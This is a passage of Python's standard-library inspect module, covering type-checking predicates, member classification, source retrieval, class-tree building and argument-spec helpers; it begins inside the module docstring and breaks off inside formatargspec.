signature() - get a Signature object for the callable
"""
# This module is in the public domain. No warranties.
__author__ = ('Ka-Ping Yee <ping@lfw.org>',
'Yury Selivanov <yselivanov@sprymix.com>')
import abc
import dis
import collections.abc
import enum
import importlib.machinery
import itertools
import linecache
import os
import re
import sys
import tokenize
import token
import types
import warnings
import functools
import builtins
from operator import attrgetter
from collections import namedtuple, OrderedDict
# Create constants for the compiler flags in Include/code.h
# We try to get them from dis to avoid duplication
mod_dict = globals()
for k, v in dis.COMPILER_FLAG_NAMES.items():
mod_dict["CO_" + v] = k
# See Include/object.h
TPFLAGS_IS_ABSTRACT = 1 << 20
# ----------------------------------------------------------- type-checking
def ismodule(object):
"""Return true if the object is a module.
Module objects provide these attributes:
__cached__ pathname to byte compiled file
__doc__ documentation string
__file__ filename (missing for built-in modules)"""
return isinstance(object, types.ModuleType)
def isclass(object):
"""Return true if the object is a class.
Class objects provide these attributes:
__doc__ documentation string
__module__ name of module in which this class was defined"""
return isinstance(object, type)
def ismethod(object):
"""Return true if the object is an instance method.
Instance method objects provide these attributes:
__doc__ documentation string
__name__ name with which this method was defined
__func__ function object containing implementation of method
__self__ instance to which this method is bound"""
return isinstance(object, types.MethodType)
def ismethoddescriptor(object):
"""Return true if the object is a method descriptor.
But not if ismethod() or isclass() or isfunction() are true.
This is new in Python 2.2, and, for example, is true of int.__add__.
An object passing this test has a __get__ attribute but not a __set__
attribute, but beyond that the set of attributes varies. __name__ is
usually sensible, and __doc__ often is.
Methods implemented via descriptors that also pass one of the other
tests return false from the ismethoddescriptor() test, simply because
the other tests promise more -- you can, e.g., count on having the
__func__ attribute (etc) when an object passes ismethod()."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__get__") and not hasattr(tp, "__set__")
def isdatadescriptor(object):
"""Return true if the object is a data descriptor.
Data descriptors have both a __get__ and a __set__ attribute. Examples are
properties (defined in Python) and getsets and members (defined in C).
Typically, data descriptors will also have __name__ and __doc__ attributes
(properties, getsets, and members have both of these attributes), but this
is not guaranteed."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__set__") and hasattr(tp, "__get__")
if hasattr(types, 'MemberDescriptorType'):
# CPython and equivalent
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.MemberDescriptorType)
else:
# Other implementations
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return False
if hasattr(types, 'GetSetDescriptorType'):
# CPython and equivalent
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.GetSetDescriptorType)
else:
# Other implementations
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return False
def isfunction(object):
"""Return true if the object is a user-defined function.
Function objects provide these attributes:
__doc__ documentation string
__name__ name with which this function was defined
__code__ code object containing compiled function bytecode
__defaults__ tuple of any default values for arguments
__globals__ global namespace in which this function was defined
__annotations__ dict of parameter annotations
__kwdefaults__ dict of keyword only parameters with defaults"""
return isinstance(object, types.FunctionType)
def isgeneratorfunction(object):
"""Return true if the object is a user-defined generator function.
Generator function objects provide the same attributes as functions.
See help(isfunction) for a list of attributes."""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_GENERATOR)
def iscoroutinefunction(object):
"""Return true if the object is a coroutine function.
Coroutine functions are defined with "async def" syntax.
"""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_COROUTINE)
def isasyncgenfunction(object):
"""Return true if the object is an asynchronous generator function.
Asynchronous generator functions are defined with "async def"
syntax and have "yield" expressions in their body.
"""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_ASYNC_GENERATOR)
def isasyncgen(object):
"""Return true if the object is an asynchronous generator."""
return isinstance(object, types.AsyncGeneratorType)
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
__iter__ defined to support iteration over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
def iscoroutine(object):
"""Return true if the object is a coroutine."""
return isinstance(object, types.CoroutineType)
def isawaitable(object):
"""Return true if object can be passed to an ``await`` expression."""
return (isinstance(object, types.CoroutineType) or
isinstance(object, types.GeneratorType) and
bool(object.gi_code.co_flags & CO_ITERABLE_COROUTINE) or
isinstance(object, collections.abc.Awaitable))
def istraceback(object):
"""Return true if the object is a traceback.
Traceback objects provide these attributes:
tb_frame frame object at this level
tb_lasti index of last attempted instruction in bytecode
tb_lineno current line number in Python source code
tb_next next inner traceback object (called by this level)"""
return isinstance(object, types.TracebackType)
def isframe(object):
"""Return true if the object is a frame object.
Frame objects provide these attributes:
f_back next outer frame object (this frame's caller)
f_builtins built-in namespace seen by this frame
f_code code object being executed in this frame
f_globals global namespace seen by this frame
f_lasti index of last attempted instruction in bytecode
f_lineno current line number in Python source code
f_locals local namespace seen by this frame
f_trace tracing function for this frame, or None"""
return isinstance(object, types.FrameType)
def iscode(object):
"""Return true if the object is a code object.
Code objects provide these attributes:
co_argcount number of arguments (not including *, ** args
or keyword only arguments)
co_code string of raw compiled bytecode
co_cellvars tuple of names of cell variables
co_consts tuple of constants used in the bytecode
co_filename name of file in which this code object was created
co_firstlineno number of first line in Python source code
co_flags bitmap: 1=optimized | 2=newlocals | 4=*arg | 8=**arg
| 16=nested | 32=generator | 64=nofree | 128=coroutine
| 256=iterable_coroutine | 512=async_generator
co_freevars tuple of names of free variables
co_kwonlyargcount number of keyword only arguments (not including ** arg)
co_lnotab encoded mapping of line numbers to bytecode indices
co_name name with which this code object was defined
co_names tuple of names of local variables
co_nlocals number of local variables
co_stacksize virtual machine stack space required
co_varnames tuple of names of arguments and local variables"""
return isinstance(object, types.CodeType)
def isbuiltin(object):
"""Return true if the object is a built-in function or method.
Built-in functions and methods provide these attributes:
__doc__ documentation string
__name__ original name of this function or method
__self__ instance to which a method is bound, or None"""
return isinstance(object, types.BuiltinFunctionType)
def isroutine(object):
"""Return true if the object is any kind of function or method."""
return (isbuiltin(object)
or isfunction(object)
or ismethod(object)
or ismethoddescriptor(object))
def isabstract(object):
"""Return true if the object is an abstract base class (ABC)."""
if not isinstance(object, type):
return False
if object.__flags__ & TPFLAGS_IS_ABSTRACT:
return True
if not issubclass(type(object), abc.ABCMeta):
return False
if hasattr(object, '__abstractmethods__'):
# It looks like ABCMeta.__new__ has finished running;
# TPFLAGS_IS_ABSTRACT should have been accurate.
return False
# It looks like ABCMeta.__new__ has not finished running yet; we're
# probably in __init_subclass__. We'll look for abstractmethods manually.
for name, value in object.__dict__.items():
if getattr(value, "__isabstractmethod__", False):
return True
for base in object.__bases__:
for name in getattr(base, "__abstractmethods__", ()):
value = getattr(object, name, None)
if getattr(value, "__isabstractmethod__", False):
return True
return False
def getmembers(object, predicate=None):
"""Return all members of an object as (name, value) pairs sorted by name.
Optionally, only return members that satisfy a given predicate."""
if isclass(object):
mro = (object,) + getmro(object)
else:
mro = ()
results = []
processed = set()
names = dir(object)
# :dd any DynamicClassAttributes to the list of names if object is a class;
# this may result in duplicate entries if, for example, a virtual
# attribute with the same name as a DynamicClassAttribute exists
try:
for base in object.__bases__:
for k, v in base.__dict__.items():
if isinstance(v, types.DynamicClassAttribute):
names.append(k)
except AttributeError:
pass
for key in names:
# First try to get the value via getattr. Some descriptors don't
# like calling their __get__ (see bug #1785), so fall back to
# looking in the __dict__.
try:
value = getattr(object, key)
# handle the duplicate key
if key in processed:
raise AttributeError
except AttributeError:
for base in mro:
if key in base.__dict__:
value = base.__dict__[key]
break
else:
# could be a (currently) missing slot member, or a buggy
# __dir__; discard and move on
continue
if not predicate or predicate(value):
results.append((key, value))
processed.add(key)
results.sort(key=lambda pair: pair[0])
return results
Attribute = namedtuple('Attribute', 'name kind defining_class object')
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method or descriptor
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained by calling getattr; if this fails, or if the
resulting object does not live anywhere in the class' mro (including
metaclasses) then the object is looked up in the defining class's
dict (found by walking the mro).
If one of the items in dir(cls) is stored in the metaclass it will now
be discovered and not have None be listed as the class in which it was
defined. Any items whose home class cannot be discovered are skipped.
"""
mro = getmro(cls)
metamro = getmro(type(cls)) # for attributes stored in the metaclass
metamro = tuple(cls for cls in metamro if cls not in (type, object))
class_bases = (cls,) + mro
all_bases = class_bases + metamro
names = dir(cls)
# :dd any DynamicClassAttributes to the list of names;
# this may result in duplicate entries if, for example, a virtual
# attribute with the same name as a DynamicClassAttribute exists.
for base in mro:
for k, v in base.__dict__.items():
if isinstance(v, types.DynamicClassAttribute):
names.append(k)
result = []
processed = set()
for name in names:
# Get the object associated with the name, and where it was defined.
# Normal objects will be looked up with both getattr and directly in
# its class' dict (in case getattr fails [bug #1785], and also to look
# for a docstring).
# For DynamicClassAttributes on the second pass we only look in the
# class's dict.
#
# Getting an obj from the __dict__ sometimes reveals more than
# using getattr. Static and class methods are dramatic examples.
homecls = None
get_obj = None
dict_obj = None
if name not in processed:
try:
if name == '__dict__':
raise Exception("__dict__ is special, don't want the proxy")
get_obj = getattr(cls, name)
except Exception as exc:
pass
else:
homecls = getattr(get_obj, "__objclass__", homecls)
if homecls not in class_bases:
# if the resulting object does not live somewhere in the
# mro, drop it and search the mro manually
homecls = None
last_cls = None
# first look in the classes
for srch_cls in class_bases:
srch_obj = getattr(srch_cls, name, None)
if srch_obj is get_obj:
last_cls = srch_cls
# then check the metaclasses
for srch_cls in metamro:
try:
srch_obj = srch_cls.__getattr__(cls, name)
except AttributeError:
continue
if srch_obj is get_obj:
last_cls = srch_cls
if last_cls is not None:
homecls = last_cls
for base in all_bases:
if name in base.__dict__:
dict_obj = base.__dict__[name]
if homecls not in metamro:
homecls = base
break
if homecls is None:
# unable to locate the attribute anywhere, most likely due to
# buggy custom __dir__; discard and move on
continue
obj = get_obj if get_obj is not None else dict_obj
# Classify the object or its descriptor.
if isinstance(dict_obj, (staticmethod, types.BuiltinMethodType)):
kind = "static method"
obj = dict_obj
elif isinstance(dict_obj, (classmethod, types.ClassMethodDescriptorType)):
kind = "class method"
obj = dict_obj
elif isinstance(dict_obj, property):
kind = "property"
obj = dict_obj
elif isroutine(obj):
kind = "method"
else:
kind = "data"
result.append(Attribute(name, kind, homecls, obj))
processed.add(name)
return result
# ----------------------------------------------------------- class helpers
def getmro(cls):
"Return tuple of base classes (including cls) in method resolution order."
return cls.__mro__
# -------------------------------------------------------- function helpers
def unwrap(func, *, stop=None):
"""Get the object wrapped by *func*.
Follows the chain of :attr:`__wrapped__` attributes returning the last
object in the chain.
*stop* is an optional callback accepting an object in the wrapper chain
as its sole argument that allows the unwrapping to be terminated early if
the callback returns a true value. If the callback never returns a true
value, the last object in the chain is returned as usual. For example,
:func:`signature` uses this to stop unwrapping if any object in the
chain has a ``__signature__`` attribute defined.
:exc:`ValueError` is raised if a cycle is encountered.
"""
if stop is None:
def _is_wrapper(f):
return hasattr(f, '__wrapped__')
else:
def _is_wrapper(f):
return hasattr(f, '__wrapped__') and not stop(f)
f = func # remember the original func for error reporting
# Memoise by id to tolerate non-hashable objects, but store objects to
# ensure they aren't destroyed, which would allow their IDs to be reused.
memo = {id(f): f}
recursion_limit = sys.getrecursionlimit()
while _is_wrapper(func):
func = func.__wrapped__
id_func = id(func)
if (id_func in memo) or (len(memo) >= recursion_limit):
raise ValueError('wrapper loop when unwrapping {!r}'.format(f))
memo[id_func] = func
return func
# -------------------------------------------------- source code extraction
def indentsize(line):
"""Return the indent size, in spaces, at the start of a line of text."""
expline = line.expandtabs()
return len(expline) - len(expline.lstrip())
def _findclass(func):
cls = sys.modules.get(func.__module__)
if cls is None:
return None
for name in func.__qualname__.split('.')[:-1]:
cls = getattr(cls, name)
if not isclass(cls):
return None
return cls
def _finddoc(obj):
if isclass(obj):
for base in obj.__mro__:
if base is not object:
try:
doc = base.__doc__
except AttributeError:
continue
if doc is not None:
return doc
return None
if ismethod(obj):
name = obj.__func__.__name__
self = obj.__self__
if (isclass(self) and
getattr(getattr(self, name, None), '__func__') is obj.__func__):
# classmethod
cls = self
else:
cls = self.__class__
elif isfunction(obj):
name = obj.__name__
cls = _findclass(obj)
if cls is None or getattr(cls, name) is not obj:
return None
elif isbuiltin(obj):
name = obj.__name__
self = obj.__self__
if (isclass(self) and
self.__qualname__ + '.' + name == obj.__qualname__):
# classmethod
cls = self
else:
cls = self.__class__
# Should be tested before isdatadescriptor().
elif isinstance(obj, property):
func = obj.fget
name = func.__name__
cls = _findclass(func)
if cls is None or getattr(cls, name) is not obj:
return None
elif ismethoddescriptor(obj) or isdatadescriptor(obj):
name = obj.__name__
cls = obj.__objclass__
if getattr(cls, name) is not obj:
return None
else:
return None
for base in cls.__mro__:
try:
doc = getattr(base, name).__doc__
except AttributeError:
continue
if doc is not None:
return doc
return None
def getdoc(object):
"""Get the documentation string for an object.
All tabs are expanded to spaces. To clean up docstrings that are
indented to line up with blocks of code, any whitespace than can be
uniformly removed from the second line onwards is removed."""
try:
doc = object.__doc__
except AttributeError:
return None
if doc is None:
try:
doc = _finddoc(object)
except (AttributeError, TypeError):
return None
if not isinstance(doc, str):
return None
return cleandoc(doc)
def cleandoc(doc):
"""Clean up indentation from docstrings.
Any whitespace that can be uniformly removed from the second line
onwards is removed."""
try:
lines = doc.expandtabs().split('\n')
except UnicodeError:
return None
else:
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxsize
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxsize:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing or leading blank lines.
while lines and not lines[-1]:
lines.pop()
while lines and not lines[0]:
lines.pop(0)
return '\n'.join(lines)
def getfile(object):
"""Work out which source or compiled file an object was defined in."""
if ismodule(object):
if getattr(object, '__file__', None):
return object.__file__
raise TypeError('{!r} is a built-in module'.format(object))
if isclass(object):
if hasattr(object, '__module__'):
object = sys.modules.get(object.__module__)
if getattr(object, '__file__', None):
return object.__file__
raise TypeError('{!r} is a built-in class'.format(object))
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
return object.co_filename
raise TypeError('module, class, method, function, traceback, frame, or '
'code object was expected, got {}'.format(
type(object).__name__))
def getmodulename(path):
"""Return the module name for a given file, or None."""
fname = os.path.basename(path)
# Check for paths that look like an actual module file
suffixes = [(-len(suffix), suffix)
for suffix in importlib.machinery.all_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix in suffixes:
if fname.endswith(suffix):
return fname[:neglen]
return None
def getsourcefile(object):
"""Return the filename that can be used to locate an object's source.
Return None if no way can be identified to get the source.
"""
filename = getfile(object)
all_bytecode_suffixes = importlib.machinery.DEBUG_BYTECODE_SUFFIXES[:]
all_bytecode_suffixes += importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES[:]
if any(filename.endswith(s) for s in all_bytecode_suffixes):
filename = (os.path.splitext(filename)[0] +
importlib.machinery.SOURCE_SUFFIXES[0])
elif any(filename.endswith(s) for s in
importlib.machinery.EXTENSION_SUFFIXES):
return None
if os.path.exists(filename):
return filename
# only return a non-existent filename if the module has a PEP 302 loader
if getattr(getmodule(object, filename), '__loader__', None) is not None:
return filename
# or it is in the linecache
if filename in linecache.cache:
return filename
def getabsfile(object, _filename=None):
"""Return an absolute path to the source or compiled file for an object.
The idea is for each object to have a unique origin, so this routine
normalizes the result as much as possible."""
if _filename is None:
_filename = getsourcefile(object) or getfile(object)
return os.path.normcase(os.path.abspath(_filename))
modulesbyfile = {}
_filesbymodname = {}
def getmodule(object, _filename=None):
"""Return the module an object was defined in, or None if not found."""
if ismodule(object):
return object
if hasattr(object, '__module__'):
return sys.modules.get(object.__module__)
# Try the filename to modulename cache
if _filename is not None and _filename in modulesbyfile:
return sys.modules.get(modulesbyfile[_filename])
# Try the cache again with the absolute file name
try:
file = getabsfile(object, _filename)
except TypeError:
return None
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Update the filename to module name cache and check yet again
# Copy sys.modules in order to cope with changes while iterating
for modname, module in list(sys.modules.items()):
if ismodule(module) and hasattr(module, '__file__'):
f = module.__file__
if f == _filesbymodname.get(modname, None):
# Have already mapped this module, so skip it
continue
_filesbymodname[modname] = f
f = getabsfile(module)
# Always map to the name the module knows itself by
modulesbyfile[f] = modulesbyfile[
os.path.realpath(f)] = module.__name__
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Check the main module
main = sys.modules['__main__']
if not hasattr(object, '__name__'):
return None
if hasattr(main, object.__name__):
mainobject = getattr(main, object.__name__)
if mainobject is object:
return main
# Check builtins
builtin = sys.modules['builtins']
if hasattr(builtin, object.__name__):
builtinobject = getattr(builtin, object.__name__)
if builtinobject is object:
return builtin
def findsource(object):
"""Return the entire source file and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of all the lines
in the file and the line number indexes a line in that list. An OSError
is raised if the source code cannot be retrieved."""
file = getsourcefile(object)
if file:
# Invalidate cache if needed.
linecache.checkcache(file)
else:
file = getfile(object)
# Allow filenames in form of "<something>" to pass through.
# `doctest` monkeypatches `linecache` module to enable
# inspection, so let `linecache.getlines` to be called.
if not (file.startswith('<') and file.endswith('>')):
raise OSError('source code not available')
module = getmodule(object, file)
if module:
lines = linecache.getlines(file, module.__dict__)
else:
lines = linecache.getlines(file)
if not lines:
raise OSError('could not get source code')
if ismodule(object):
return lines, 0
if isclass(object):
name = object.__name__
pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
# make some effort to find the best matching class definition:
# use the one with the least indentation, which is the one
# that's most probably not inside a function definition.
candidates = []
for i in range(len(lines)):
match = pat.match(lines[i])
if match:
# if it's at toplevel, it's already the best one
if lines[i][0] == 'c':
return lines, i
# else add whitespace to candidate list
candidates.append((match.group(1), i))
if candidates:
# this will sort by whitespace, and by line number,
# less whitespace first
candidates.sort()
return lines, candidates[0][1]
else:
raise OSError('could not find class definition')
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
if not hasattr(object, 'co_firstlineno'):
raise OSError('could not find function definition')
lnum = object.co_firstlineno - 1
pat = re.compile(r'^(\s*def\s)|(\s*async\s+def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
while lnum > 0:
if pat.match(lines[lnum]): break
lnum = lnum - 1
return lines, lnum
raise OSError('could not find code object')
def getcomments(object):
"""Get lines of comments immediately preceding an object's source code.
Returns None when source can't be found.
"""
try:
lines, lnum = findsource(object)
except (OSError, TypeError):
return None
if ismodule(object):
# Look for a comment block at the top of the file.
start = 0
if lines and lines[0][:2] == '#!': start = 1
while start < len(lines) and lines[start].strip() in ('', '#'):
start = start + 1
if start < len(lines) and lines[start][:1] == '#':
comments = []
end = start
while end < len(lines) and lines[end][:1] == '#':
comments.append(lines[end].expandtabs())
end = end + 1
return ''.join(comments)
# Look for a preceding block of comments at the same indentation.
elif lnum > 0:
indent = indentsize(lines[lnum])
end = lnum - 1
if end >= 0 and lines[end].lstrip()[:1] == '#' and \
indentsize(lines[end]) == indent:
comments = [lines[end].expandtabs().lstrip()]
if end > 0:
end = end - 1
comment = lines[end].expandtabs().lstrip()
while comment[:1] == '#' and indentsize(lines[end]) == indent:
comments[:0] = [comment]
end = end - 1
if end < 0: break
comment = lines[end].expandtabs().lstrip()
while comments and comments[0].strip() == '#':
comments[:1] = []
while comments and comments[-1].strip() == '#':
comments[-1:] = []
return ''.join(comments)
class EndOfBlock(Exception): pass
class BlockFinder:
"""Provide a tokeneater() method to detect the end of a code block."""
def __init__(self):
self.indent = 0
self.islambda = False
self.started = False
self.passline = False
self.indecorator = False
self.decoratorhasargs = False
self.last = 1
def tokeneater(self, type, token, srowcol, erowcol, line):
if not self.started and not self.indecorator:
# skip any decorators
if token == "@":
self.indecorator = True
# look for the first "def", "class" or "lambda"
elif token in ("def", "class", "lambda"):
if token == "lambda":
self.islambda = True
self.started = True
self.passline = True # skip to the end of the line
elif token == "(":
if self.indecorator:
self.decoratorhasargs = True
elif token == ")":
if self.indecorator:
self.indecorator = False
self.decoratorhasargs = False
elif type == tokenize.NEWLINE:
self.passline = False # stop skipping when a NEWLINE is seen
self.last = srowcol[0]
if self.islambda: # lambdas always end at the first NEWLINE
raise EndOfBlock
# hitting a NEWLINE when in a decorator without args
# ends the decorator
if self.indecorator and not self.decoratorhasargs:
self.indecorator = False
elif self.passline:
pass
elif type == tokenize.INDENT:
self.indent = self.indent + 1
self.passline = True
elif type == tokenize.DEDENT:
self.indent = self.indent - 1
# the end of matching indent/dedent pairs end a block
# (note that this only works for "def"/"class" blocks,
# not e.g. for "if: else:" or "try: finally:" blocks)
if self.indent <= 0:
raise EndOfBlock
elif self.indent == 0 and type not in (tokenize.COMMENT, tokenize.NL):
# any other token on the same indentation level end the previous
# block as well, except the pseudo-tokens COMMENT and NL.
raise EndOfBlock
def getblock(lines):
"""Extract the block of code at the top of the given list of lines."""
blockfinder = BlockFinder()
try:
tokens = tokenize.generate_tokens(iter(lines).__next__)
for _token in tokens:
blockfinder.tokeneater(*_token)
except (EndOfBlock, IndentationError):
pass
return lines[:blockfinder.last]
def getsourcelines(object):
"""Return a list of source lines and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of the lines
corresponding to the object and the line number indicates where in the
original source file the first line of code was found. An OSError is
raised if the source code cannot be retrieved."""
object = unwrap(object)
lines, lnum = findsource(object)
if istraceback(object):
object = object.tb_frame
# for module or frame that corresponds to module, return all source lines
if (ismodule(object) or
(isframe(object) and object.f_code.co_name == "<module>")):
return lines, 0
else:
return getblock(lines[lnum:]), lnum + 1
def getsource(object):
"""Return the text of the source code for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a single string. An
OSError is raised if the source code cannot be retrieved."""
lines, lnum = getsourcelines(object)
return ''.join(lines)
# --------------------------------------------------- class tree extraction
def walktree(classes, children, parent):
"""Recursive helper function for getclasstree()."""
results = []
classes.sort(key=attrgetter('__module__', '__name__'))
for c in classes:
results.append((c, c.__bases__))
if c in children:
results.append(walktree(children[c], children, c))
return results
def getclasstree(classes, unique=False):
"""Arrange the given list of classes into a hierarchy of nested lists.
Where a nested list appears, it contains classes derived from the class
whose entry immediately precedes the list. Each entry is a 2-tuple
containing a class and a tuple of its base classes. If the 'unique'
argument is true, exactly one entry appears in the returned structure
for each class in the given list. Otherwise, classes using multiple
inheritance and their descendants will appear multiple times."""
children = {}
roots = []
for c in classes:
if c.__bases__:
for parent in c.__bases__:
if not parent in children:
children[parent] = []
if c not in children[parent]:
children[parent].append(c)
if unique and parent in classes: break
elif c not in roots:
roots.append(c)
for parent in children:
if parent not in classes:
roots.append(parent)
return walktree(roots, children, None)
# ------------------------------------------------ argument list extraction
Arguments = namedtuple('Arguments', 'args, varargs, varkw')
def getargs(co):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where
'args' is the list of argument names. Keyword-only arguments are
appended. 'varargs' and 'varkw' are the names of the * and **
arguments or None."""
args, varargs, kwonlyargs, varkw = _getfullargs(co)
return Arguments(args + kwonlyargs, varargs, varkw)
def _getfullargs(co):
"""Get information about the arguments accepted by a code object.
Four things are returned: (args, varargs, kwonlyargs, varkw), where
'args' and 'kwonlyargs' are lists of argument names, and 'varargs'
and 'varkw' are the names of the * and ** arguments or None."""
if not iscode(co):
raise TypeError('{!r} is not a code object'.format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount
args = list(names[:nargs])
kwonlyargs = list(names[nargs:nargs+nkwargs])
step = 0
nargs += nkwargs
varargs = None
if co.co_flags & CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return args, varargs, kwonlyargs, varkw
ArgSpec = namedtuple('ArgSpec', 'args varargs keywords defaults')
def getargspec(func):
"""Get the names and default values of a function's parameters.
A tuple of four things is returned: (args, varargs, keywords, defaults).
'args' is a list of the argument names, including keyword-only argument names.
'varargs' and 'keywords' are the names of the * and ** parameters or None.
'defaults' is an n-tuple of the default values of the last n parameters.
This function is deprecated, as it does not support annotations or
keyword-only parameters and will raise ValueError if either is present
on the supplied callable.
For a more structured introspection API, use inspect.signature() instead.
Alternatively, use getfullargspec() for an API with a similar namedtuple
based interface, but full support for annotations and keyword-only
parameters.
Deprecated since Python 3.5, use `inspect.getfullargspec()`.
"""
warnings.warn("inspect.getargspec() is deprecated since Python 3.0, "
"use inspect.signature() or inspect.getfullargspec()",
DeprecationWarning, stacklevel=2)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = \
getfullargspec(func)
if kwonlyargs or ann:
raise ValueError("Function has keyword-only parameters or annotations"
", use getfullargspec() API which can support them")
return ArgSpec(args, varargs, varkw, defaults)
FullArgSpec = namedtuple('FullArgSpec',
'args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations')
def getfullargspec(func):
"""Get the names and default values of a callable object's parameters.
A tuple of seven things is returned:
(args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations).
'args' is a list of the parameter names.
'varargs' and 'varkw' are the names of the * and ** parameters or None.
'defaults' is an n-tuple of the default values of the last n parameters.
'kwonlyargs' is a list of keyword-only parameter names.
'kwonlydefaults' is a dictionary mapping names from kwonlyargs to defaults.
'annotations' is a dictionary mapping parameter names to annotations.
Notable differences from inspect.signature():
- the "self" parameter is always reported, even for bound methods
- wrapper chains defined by __wrapped__ *not* unwrapped automatically
"""
try:
# Re: `skip_bound_arg=False`
#
# There is a notable difference in behaviour between getfullargspec
# and Signature: the former always returns 'self' parameter for bound
# methods, whereas the Signature always shows the actual calling
# signature of the passed object.
#
# To simulate this behaviour, we "unbind" bound methods, to trick
# inspect.signature to always return their first parameter ("self",
# usually)
# Re: `follow_wrapper_chains=False`
#
# getfullargspec() historically ignored __wrapped__ attributes,
# so we ensure that remains the case in 3.3+
sig = _signature_from_callable(func,
follow_wrapper_chains=False,
skip_bound_arg=False,
sigcls=Signature)
except Exception as ex:
# Most of the times 'signature' will raise ValueError.
# But, it can also raise AttributeError, and, maybe something
# else. So to be fully backwards compatible, we catch all
# possible exceptions here, and reraise a TypeError.
raise TypeError('unsupported callable') from ex
args = []
varargs = None
varkw = None
kwonlyargs = []
defaults = ()
annotations = {}
defaults = ()
kwdefaults = {}
if sig.return_annotation is not sig.empty:
annotations['return'] = sig.return_annotation
for param in sig.parameters.values():
kind = param.kind
name = param.name
if kind is _POSITIONAL_ONLY:
args.append(name)
elif kind is _POSITIONAL_OR_KEYWORD:
args.append(name)
if param.default is not param.empty:
defaults += (param.default,)
elif kind is _VAR_POSITIONAL:
varargs = name
elif kind is _KEYWORD_ONLY:
kwonlyargs.append(name)
if param.default is not param.empty:
kwdefaults[name] = param.default
elif kind is _VAR_KEYWORD:
varkw = name
if param.annotation is not param.empty:
annotations[name] = param.annotation
if not kwdefaults:
# compatibility with 'func.__kwdefaults__'
kwdefaults = None
if not defaults:
# compatibility with 'func.__defaults__'
defaults = None
return FullArgSpec(args, varargs, varkw, defaults,
kwonlyargs, kwdefaults, annotations)
ArgInfo = namedtuple('ArgInfo', 'args varargs keywords locals')
def getargvalues(frame):
"""Get information about arguments passed into a particular frame.
A tuple of four things is returned: (args, varargs, varkw, locals).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'locals' is the locals dictionary of the given frame."""
args, varargs, varkw = getargs(frame.f_code)
return ArgInfo(args, varargs, varkw, frame.f_locals)
def formatannotation(annotation, base_module=None):
if getattr(annotation, '__module__', None) == 'typing':
return repr(annotation).replace('typing.', '')
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', base_module):
return annotation.__qualname__
return annotation.__module__+'.'+annotation.__qualname__
return repr(annotation)
def formatannotationrelativeto(object):
module = getattr(object, '__module__', None)
def _formatannotation(annotation):
return formatannotation(annotation, module)
return _formatannotation
def formatargspec(args, varargs=None, varkw=None, defaults=None,
kwonlyargs=(), kwonlydefaults={}, annotations={},
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value),
formatreturns=lambda text: ' -> ' + text,
formatannotation=formatannotation):
"""Format an argument spec from the values returned by getfullargspec.
The first seven arguments are (args, varargs, varkw, defaults,
kwonlyargs, kwonlydefaults, annotations). The other five arguments
are the corresponding optional formatting functions that are called to
turn names and values into strings. The last argument is an optional
function to format the sequence of arguments.
Deprecated since Python 3.5: use the `signature` function and `Signature`
objects.
"""
from warnings import warn
warn("`formatargspec` is deprecated since Python 3.5. Use `signature` and "
"the `Signature` object directly",
DeprecationWarning,
stacklevel=2)
def formatargandannotation(arg):
result = formatarg(arg)
if arg in annotations:
